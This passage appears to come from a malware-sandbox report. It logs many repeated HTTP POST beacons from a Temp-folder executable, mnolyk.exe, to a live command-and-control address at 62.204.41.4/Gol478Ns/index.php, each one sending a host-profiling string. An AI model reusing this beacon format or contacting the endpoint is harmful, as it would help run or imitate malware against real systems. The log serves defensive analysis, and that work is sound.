                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:20.000106096 CET187INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      720192.168.2.75041562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:12.934992075 CET835OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.998701096 CET835INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      721192.168.2.75041662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:13.181627035 CET836OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:13.246825933 CET836INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      722192.168.2.75041762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:13.425467968 CET837OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:13.488778114 CET837INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      723192.168.2.75041862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:13.656697035 CET838OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:13.720968008 CET838INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      724192.168.2.75041962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:13.897365093 CET839OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:13.959821939 CET839INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      725192.168.2.75042062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:14.158818960 CET840OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:14.224035978 CET840INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      726192.168.2.75042162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:14.406003952 CET841OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:14.470053911 CET841INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      727192.168.2.75042262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:14.657367945 CET842OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:14.722737074 CET842INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      728192.168.2.75042362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:14.904731989 CET843OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:14.969476938 CET843INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      729192.168.2.75042462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:15.140263081 CET844OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:15.204756975 CET844INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      73192.168.2.74976862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:20.940206051 CET188OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.005235910 CET188INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      730192.168.2.75042562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:15.374875069 CET845OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:15.437989950 CET845INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      731192.168.2.75042662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:15.811820030 CET846OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:15.874625921 CET846INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      732192.168.2.75042762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:16.088952065 CET847OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:16.156971931 CET847INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      733192.168.2.75042862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:16.360692978 CET848OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:16.426949024 CET848INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      734192.168.2.75042962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:17.103178024 CET849OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:17.167263985 CET849INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      735192.168.2.75043062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:18.142734051 CET850OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:18.207896948 CET850INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      736192.168.2.75043162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:18.720531940 CET851OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:18.785145998 CET851INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      737192.168.2.75043262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:18.991988897 CET852OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.058875084 CET852INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
